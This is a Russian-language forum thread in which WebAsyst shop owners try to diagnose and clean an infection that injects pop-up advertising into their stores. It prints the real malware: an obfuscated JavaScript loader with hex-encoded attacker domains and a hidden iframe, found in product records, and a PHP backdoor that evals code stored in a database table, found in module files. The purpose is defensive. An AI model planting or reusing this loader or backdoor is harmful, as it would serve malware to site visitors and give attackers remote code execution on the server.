[Помощь] СРОЧНО в cpt_maincontent - вставили вирусы - где копать?

Тема в разделе "WebAsyst", создана пользователем Pal, 29 окт 2015.

Модераторы: mdss
  1. rusel666

    rusel666 Постоялец

    Регистр.:
    11 мар 2009
    Сообщения:
    143
    Симпатии:
    11
    Опишите пожалуйста, как удалось решить. На сайте тоже стала появляться всплывающая реклама, как вставили и где копать не понимаю... У некоторых посетителей антивирус ругается...
     
  2. Pal

    Pal

    Регистр.:
    21 май 2008
    Сообщения:
    363
    Симпатии:
    12
    ищите изменения в файлах, я поиском по файлам проходился, а дальше вручную смотрел где и что вставлено
    добрым программистам давали доступ? мне один товарищь сам постучался - услуги, брал дорого, потом начал вперед деньги просить - заплатил - так он совсем пропал - при этом вставил свою ерунду, как только удалил - снова объявился - давай говорит поработаем :)
     
  3. rusel666

    rusel666 Постоялец

    Регистр.:
    11 мар 2009
    Сообщения:
    143
    Симпатии:
    11
    Все делали сами. Вредоносный код с всплывающими баннерами нашел в Базе данных 71 соответствие в таблице SC_products , вот прилагаю код, может кто -нибудь поможет или сталкивался... Как прописали и кто, непонятно :(
    Код:
    <p></p>
    <script type="text/javascript">// <![CDATA[
    window.a1336404323 = 1;!function(){var o=JSON.parse('["6277393576706a64612e7275","393667743863796932373774682e7275"]'),e="",t="10029",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("имя нашего сайта")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();
    // ]]></script>
    <p><iframe id="a1996667054" width="320" height="240" style="display: none;" src="https://bw95vpjda.ru/f.html"></iframe></p>
     
  4. rusel666

    rusel666 Постоялец

    Регистр.:
    11 мар 2009
    Сообщения:
    143
    Симпатии:
    11
    Если кому интересно, как вышли из ситуации. Вирус был не на сайте, а на ПК администраторов. При создании товара в браузере Firefox автоматически вставлялся код с iframe баннерной сети. Поиск и проверка на вирусы не давала результаты, т.к. товары и соответственно вредоносный код прописан в БД. Поиск в БД по вредоносной ссылке - и результат 180 совпадений. Вручную редактируем через админку "инфицированные" товары или в БД. Чистка ПК админов- и проблема решена.
     
  5. Svet.Mat

    Svet.Mat Создатель

    Регистр.:
    11 дек 2012
    Сообщения:
    12
    Симпатии:
    0
    Возможно кому-то пригодится:
    Если у вас вставляется код sape (или еще acint.net) в maincontent проверьте 2 файла:
    /kernel/includes/pear/PEAR.php
    и
    /published/SC/html/scripts/modules/test/class.test.php
    На сколько я понял еще не должно быть файла
    /published/SC/localization/wbsstyle.php
     
  6. alexv1r

    alexv1r Писатель

    Регистр.:
    5 дек 2013
    Сообщения:
    5
    Симпатии:
    0
    Такая же беда была - код отыскался в табличке SC_session_groups. В виде сессий был вредоносный код, который компилился через смарти. При авторизации реклама пропадала. Если выясню как попал в БД - дам знать.
     
  7. alexv1r

    alexv1r Писатель

    Регистр.:
    5 дек 2013
    Сообщения:
    5
    Симпатии:
    0
    Код вставки вредоноса в файлике /publised/SC/html/scripts/modules/test/class.test.php

    Код:
        if (mysql_query("SELECT * FROM SC_session_groups")) {
                        $cpt_session_groups = db_query("SELECT _SESSION FROM SC_session_groups") or die(db_error());
                   
                        if (isset($cpt_session_groups)) {
                                while ($_cpt = db_fetch_row($cpt_session_groups)) {
                                        global $session_groups;
                                        $session_groups = eval($_cpt['_SESSION']);
                                        }
                                    }
                                } else    {
                            $session_groups = '';
                    }
                    print $session_groups;
    
     
  8. NhGXkv85PR

    NhGXkv85PR

    Регистр.:
    20 дек 2007
    Сообщения:
    185
    Симпатии:
    25
    Правильно понимаю, этой таблицы в магазине быть не должно, можно полностью ее удалить?
     
  9. NhGXkv85PR

    NhGXkv85PR

    Регистр.:
    20 дек 2007
    Сообщения:
    185
    Симпатии:
    25
    У меня кода этого нет, видимо восстановил магазин до того момента как код внедрили. А вот табличка нашлась, так как базу я не восстанавливал.
    У Вас давно реклама эта появилась? У меня первый раз еще в январе, а потом заметил пару недель назад.
     
  10. NhGXkv85PR

    NhGXkv85PR

    Регистр.:
    20 дек 2007
    Сообщения:
    185
    Симпатии:
    25
    в январском бэкапе нашел код в файле \published\SC\html\scripts\modules\news\class.newsmodule.php, так что видимо возможны варианты куда код вставляют, главное разобраться бы как это делают чтобы решить вопрос

    if (mysql_query("SELECT * FROM SC_session_groups")) {
    $cpt_session_groups = db_query("SELECT _SESSION FROM SC_session_groups") or die(db_error());
    $cpt_session_groups = db_query("SELECT _SESSION FROM SC_session_groups") or die(db_error());
    if (isset($cpt_session_groups)) {
    while ($_cpt = db_fetch_row($cpt_session_groups)) {
    global $session_groups;
    $session_groups = eval($_cpt['_SESSION']);
    $session_groups = '';
    print $session_groups;